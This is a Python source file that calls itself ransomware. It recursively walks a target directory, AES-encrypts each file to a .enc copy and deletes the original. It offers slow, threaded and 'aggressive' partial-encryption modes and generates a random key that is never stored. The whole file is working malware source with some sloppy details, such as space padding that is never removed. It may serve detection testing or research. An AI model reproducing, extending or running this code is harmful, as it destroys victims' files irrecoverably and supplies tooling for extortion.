import argparse
from concurrent.futures import ThreadPoolExecutor
import os
from time import sleep

from Crypto import Random
from Crypto.Cipher import AES
from Crypto.Random.random import *
import os
import argparse
import random

SYMMETRIC_KEY_SIZE = 32
DEFAULT_BLOCK_SIZE = 16

class Cryptor:
    """
        Is implemented with AES algorithm CBC mode
    """

    def __init__(self, symmetric_key, init_directory):
        self.symmetric_key = symmetric_key
        self.init_directory = init_directory
        self.block_size = DEFAULT_BLOCK_SIZE
        self.IV = b"james_webb123456"

    def encrypt(self):
        pass
    
    def decrypt(self):
        pass


class StandardCryptor(Cryptor):

    def __check_dst(self, src):
        dir_path = os.path.dirname(os.path.realpath(src))
        dst_path = src
        if not os.access(dir_path, os.W_OK):
            # TODO: Create dir to save encrypted file.
            pass
        return dst_path

    def encrypt_file(self, path_to_file):
        if not os.path.exists(path_to_file) or not os.access(path_to_file, os.R_OK):
            # File is not exist or cannot read it
            return
        
        # Set target path.
        dst_path = self.__check_dst(path_to_file)
        
        # Open input file (file to encrypt)
        infile = open(path_to_file, 'rb')
        
        # Open target file (new file)
        outfile = open(dst_path + ".enc", 'wb')
        
        # AES cipher
        cipher = AES.new(self.symmetric_key, AES.MODE_CBC, self.IV)

        # Encrypt chunks
        while True:
            block = infile.read(self.block_size)
            if len(block) == 0:
                break
            elif len(block) % 16 != 0:
                block += b' '  * (16-len(block) % 16)

            outfile.write(cipher.encrypt(block))

        # Close files
        infile.close()
        outfile.close()
        
        # Try remove input file
        try:
            os.remove(path_to_file)
        except OSError:
            # TODO: Save warning
            pass
        
        # TODO: Verify encrypted file

    def decrypt_file(self, path_to_file):
        if not os.path.exists(path_to_file) or not os.access(path_to_file, os.R_OK):
            # File is not exist or cannot read it
            return
        
        # Set target path.
        dst_path = self.__check_dst(path_to_file)
        
        # Open input file (file to decrypt)
        infile = open(path_to_file, 'rb')
        
        # Open target file (new file)
        old_name_file = dst_path[:-4]
        outfile = open(old_name_file, 'wb')
        
        # AES cipher
        cipher = AES.new(self.symmetric_key, AES.MODE_CBC, self.IV)

        # Decrypt chunks
        while True:
            block = infile.read(self.block_size)
            if len(block) == 0:
                break
            elif len(block) % 16 != 0:
                block += b' '  * (16-len(block) % 16)

            outfile.write(cipher.decrypt(block))

        # Close files
        infile.close()
        outfile.close()
        
        # Try remove input file
        try:
            os.remove(path_to_file)
        except OSError as e:
            print("Cannot remove file: ", e)

    def encrypt(self):
        # Walk from init directory
        for root, dirs, files in os.walk(self.init_directory):
            for file in files:
                print("Encrypting: ", str(os.path.join(root, file)))
                self.encrypt_file(os.path.join(root, file))

    def decrypt(self):
        for root, dirs, files in os.walk(self.init_directory):
            for file in files:
                print("Decrypting: ", str(os.path.join(root, file)))
                self.decrypt_file(os.path.join(root, file))


class SlowCryptor(Cryptor):

    def __check_dst(self, src):
        dir_path = os.path.dirname(os.path.realpath(src))
        dst_path = src
        if not os.access(dir_path, os.W_OK):
            os.makedirs(dir_path) #TODO test this
        return dst_path

    def __encrypt_file(self, path_to_file):
        if not os.path.exists(path_to_file) or not os.access(path_to_file, os.R_OK):
            # File is not exist or cannot read it
            return
        
        # Set target path.
        dst_path = self.__check_dst(path_to_file)
        
        # Open input file (file to encrypt)
        infile = open(path_to_file, 'rb')
        
        # Open target file (new file)
        outfile = open(dst_path + ".enc", 'wb')
        
        # AES cipher
        cipher = AES.new(self.symmetric_key, AES.MODE_CBC, self.IV)

        # Encrypt chunks
        while True:
            block = infile.read(self.block_size)

            if len(block) == 0:
                break
            elif len(block) % self.block_size != 0:
                block += b' '  * (self.block_size - len(block) % self.block_size)

            outfile.write(cipher.encrypt(block))

        # Close files
        infile.close()
        outfile.close()
        
        # Try remove input file
        try:
            os.remove(path_to_file)
        except OSError as e:
            print("Cannot remove file: ", e)
        
        # TODO: Verify encrypted file

    def __decrypt_file(self, path_to_file):
        if not os.path.exists(path_to_file) or not os.access(path_to_file, os.R_OK):
            # File is not exist or cannot read it
            return
        
        # Set target path.
        dst_path = self.__check_dst(path_to_file)
        
        # Open input file (file to decrypt)
        infile = open(path_to_file, 'rb')
        
        # Open target file (new file)
        old_name_file = dst_path[:-4]
        outfile = open(old_name_file, 'wb')
        
        # AES cipher
        cipher = AES.new(self.symmetric_key, AES.MODE_CBC, self.IV)

        # Decrypt chunks
        while True:
            block = infile.read(self.block_size)
            if len(block) == 0:
                break
            elif len(block) % 16 != 0:
                block += b' '  * (16-len(block) % 16)

            outfile.write(cipher.decrypt(block))

        # Close files
        infile.close()
        outfile.close()
        
        # Try remove input file
        try:
            os.remove(path_to_file)
        except OSError as e:
            print("Cannot remove file: ", e)

    def encrypt(self):
        # Walk from init directory
        for root, dirs, files in os.walk(self.init_directory):
            for file in files:
                # Encrypt file only if it is not encrypted
                if file.endswith(".enc"):
                    continue
                print("Encrypting: ", str(os.path.join(root, file)))
                self.__encrypt_file(os.path.join(root, file))
                            
                # Sleep random time to slow down encryption
                sleep(random.uniform(1, 5))

    def decrypt(self):
        for root, dirs, files in os.walk(self.init_directory):
            for file in files:
                # Decrypt file only if ends in .enc
                if not file.endswith(".enc"):
                    continue

                print("Decrypting: ", str(os.path.join(root, file)))
                self.__decrypt_file(os.path.join(root, file))


class ThreadedCryptor(StandardCryptor):

    def __init__(self, symmetric_key, init_directory, num_threads=4):
        super().__init__(symmetric_key, init_directory)
        self.num_threads = num_threads

    def encrypt(self):
        for root, dirs, files in os.walk(self.init_directory):
            for file in files:
                # Encrypt file only if it is not encrypted
                if file.endswith(".enc"):
                    continue
                print("Encrypting: ", str(os.path.join(root, file)))
                executor = ThreadPoolExecutor(max_workers=self.num_threads)
                executor.submit(self.encrypt_file, os.path.join(root, file))

    def decrypt(self):
        for root, dirs, files in os.walk(self.init_directory):
            for file in files:
                # Decrypt file only if ends in .enc
                if not file.endswith(".enc"):
                    continue

                print("Decrypting: ", str(os.path.join(root, file)))
                executor = ThreadPoolExecutor(max_workers=self.num_threads)
                executor.submit(self.decrypt_file, (os.path.join(root, file)))


class AggressiveCryptor(Cryptor):

    def encrypt_file(self, path_to_file):
        if not os.path.exists(path_to_file) or not os.access(path_to_file, os.R_OK):
            return
        #dst_path = self.__check_dst(path_to_file)
        #if dst_path is None:
        #    return

        infile = open(path_to_file, 'rb')
        outfile = open(path_to_file + ".enc", 'wb')
        cipher = AES.new(self.symmetric_key, AES.MODE_CBC, self.IV)
        encryption_ranges = self.__get_encryption_ranges(path_to_file)
        next_range = encryption_ranges.pop(0)
        bytes_read = 0
        pop_range = False

        while True:

            block = infile.read(self.block_size)

            if len(block) == 0:
                break
            if len(block) == 0:
                break
            elif len(block) % self.block_size != 0:
                block += b' '  * (self.block_size - len(block) % self.block_size)
            bytes_read += len(block)
            if next_range[0] <= bytes_read-1 <= next_range[1]:

                cipher_block = cipher.encrypt(block)
                outfile.write(cipher_block)
                pop_range = True
            else:
                outfile.write(block)
                if pop_range and len(encryption_ranges):
                    next_range = encryption_ranges.pop(0)
                    pop_range = False
        infile.close()
        outfile.close()
        try:
            os.remove(path_to_file)
        except OSError:
            return

    def decrypt_file(self, path_to_file):
        infile = open(path_to_file, 'rb')
        outfile = open(path_to_file[:-4], 'wb')
        decryption_ranges = self.__get_decryption_ranges(path_to_file)
        next_range = decryption_ranges.pop(0)
        #bandera para validar si es necesario sacar otra tupla de rangos de la lista
        pop_range = False

        cipher = AES.new(self.symmetric_key, AES.MODE_CBC, self.IV)
        bytes_read = 0

        while True:
            block = infile.read(self.block_size)

            if len(block) == 0:
                break
            elif len(block) % self.block_size != 0:
                block += b' '  * (self.block_size - len(block) % self.block_size)

            bytes_read += len(block)
            if next_range[0] <= bytes_read - 1 <= next_range[1]:
                cipher_block = cipher.decrypt(block)
                outfile.write(cipher_block)
                pop_range = True

            else:
                outfile.write(block)
                if pop_range and len(decryption_ranges):
                    next_range = decryption_ranges.pop(0)
                    pop_range = False

        infile.close()
        outfile.close()
        try:
            os.remove(path_to_file)
        except OSError:
            return



    def __get_decryption_ranges(self, path_to_file):

        if not os.path.exists(path_to_file):
            return None
        size = os.stat(path_to_file).st_size
        if size % 16 != 0:
            size += (16 - (size % 16))
        ranges = list()
        if size <= (400 * 1024):
           ranges.append((0, size-1))
        elif (400 * 1024) < size <= (800 * 1024):
            ranges.append((0, (200*1024)-1))
            ranges.append((size-(200*1024)-1, size-1))
        else:
            count = 0
            while count < size:
                ranges.append((count, count + (200*1024)-1))
                count += (200*1024)*2
            if ranges[len(ranges)-1][1] < size-1:
                ranges.append((ranges[len(ranges)-1][1]+1, size-1))

        return ranges

    def __get_encryption_ranges(self, path_to_file):
        if not os.path.exists(path_to_file):
            return None
        size = os.stat(path_to_file).st_size
        if size % 16 != 0:
            size += (16 - (size % 16))
        ranges = list()
        if size <= (400 * 1024):
           ranges.append((0, size-1))
        elif (400 * 1024) < size <= (800 * 1024):
            ranges.append((0, (200*1024)-1))
            ranges.append((size-(200*1024)-1, size-1))
        else:
            count = 0
            while count < size:
                ranges.append((count, count + (200*1024)-1))
                count += (200*1024)*2
            if ranges[len(ranges)-1][1] < size-1:
                ranges.append((ranges[len(ranges)-1][1]+1, size-1))

        return ranges

    def encrypt(self):
        for root, dirs, files in os.walk(self.init_directory):
            for file in files:
                # Encrypt file only if it is not encrypted
                if file.endswith(".enc"):
                    continue
                print("Encrypting: ", str(os.path.join(root, file)))
                self.encrypt_file(os.path.join(root, file))

    def decrypt(self):
        for root, dirs, files in os.walk(self.init_directory):
            for file in files:
                # Decrypt file only if ends in .enc
                if not file.endswith(".enc"):
                    continue

                print("Decrypting: ", str(os.path.join(root, file)))
                self.decrypt_file(os.path.join(root, file))

def get_symmetric_key():
    """
        Generate random key.
    """
    rndfile = Random.new()
    symmetric_key = rndfile.read(SYMMETRIC_KEY_SIZE)
    return symmetric_key


def main():
    parser = argparse.ArgumentParser(description='Run ransomware in a directory.')
    parser.add_argument('--interactive-mode', required=False, help='Interactive mode.', action='store_true')
    parser.add_argument('--target-dir', required=True, help='Directory to encrypt.')
    parser.add_argument('--type', required=True, help='Type of cryptor. (aggressive, slow, normal, thread)')
    parser.add_argument('--decrypt', required=False, help='Decrypt files.', action='store_true')

    args = parser.parse_args()

    # Get symmetric key
    symmetric_key = get_symmetric_key()
    cryptor = StandardCryptor(symmetric_key, args.target_dir)
    if args.type == "aggressive":
        cryptor = AggressiveCryptor(symmetric_key, args.target_dir)
    elif args.type == "slow":
        cryptor = SlowCryptor(symmetric_key, args.target_dir)
    elif args.type == "thread":
        cryptor = ThreadedCryptor(symmetric_key, args.target_dir)

    if args.interactive_mode:
        while True:
            print("Welcome:")
            print("1. Encrypt files.")
            print("2. Decrypt files.")
            print("3. Exit.")

            option = input("Select option: ")
            if option == "1":
                directory = input("Enter directory (or folder): ")
                # Verify dir
                if os.path.exists(directory):
                    if os.access(directory, os.R_OK):
                        symmetric_key = get_symmetric_key()
                        cryptor = StandardCryptor(symmetric_key, directory)
                        cryptor.encrypt()
                    else:
                        print("Warning: Cannot read directory")
                else:
                    print("Warning: Directory does not exist")
            elif option == "2":
                directory = input("Enter directory (or folder): ")
                # TODO
            elif option == "3":
                print("bye")
                break
            else:
                print("Incorrect option")
    else:
        directory = args.target_dir
        if os.path.exists(directory):
            if os.access(directory, os.R_OK):
                if not args.decrypt:
                    cryptor.encrypt()
                else:
                    cryptor.decrypt()
            else:
                print("Warning: Cannot read directory")
        else:
            print("Warning: Directory does not exist")


if __name__ == "__main__":
    main()
